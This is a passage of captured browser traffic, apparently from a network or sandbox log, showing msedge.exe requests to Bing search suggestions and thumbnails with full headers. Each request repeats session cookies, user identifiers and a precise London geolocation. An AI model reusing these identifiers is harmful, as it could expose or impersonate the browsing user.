sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6504
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d242
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dar&cp=3&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dar&cp=3&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2968
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d246
GET

https://www.bing.com/th?id=OSK.a5a7afbf6a82d9e8d19ed94a499dcf14&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.a5a7afbf6a82d9e8d19ed94a499dcf14&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8940
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d243
GET

https://www.bing.com/th?id=OSK.6010d7846e469d63168a9874d6fa8238&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.6010d7846e469d63168a9874d6fa8238&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4456
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d247
GET

https://www.bing.com/th?id=OSK.1e74c5e14e5f343df1836a5392c5166d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.1e74c5e14e5f343df1836a5392c5166d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 6893
date: Wed, 04 Dec 2024 10:08:57 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d245
GET

https://www.bing.com/th?id=OSK.0Rsn5LxsRVKwyD5cOYa9PWRO2169Us7Uic-TQ5gKuiI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.0Rsn5LxsRVKwyD5cOYa9PWRO2169Us7Uic-TQ5gKuiI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1302
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a391ece467a991b6518ea70170b
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-gpGgaVgHeq27foBzjsNY63+4QNWDom9rTLsyxbOZF6E='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:57 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306937.7f1d2c8
GET

https://www.bing.com/th?id=OSK.a8badd1e8dc401fc426db757c36a2718&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OSK.a8badd1e8dc401fc426db757c36a2718&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
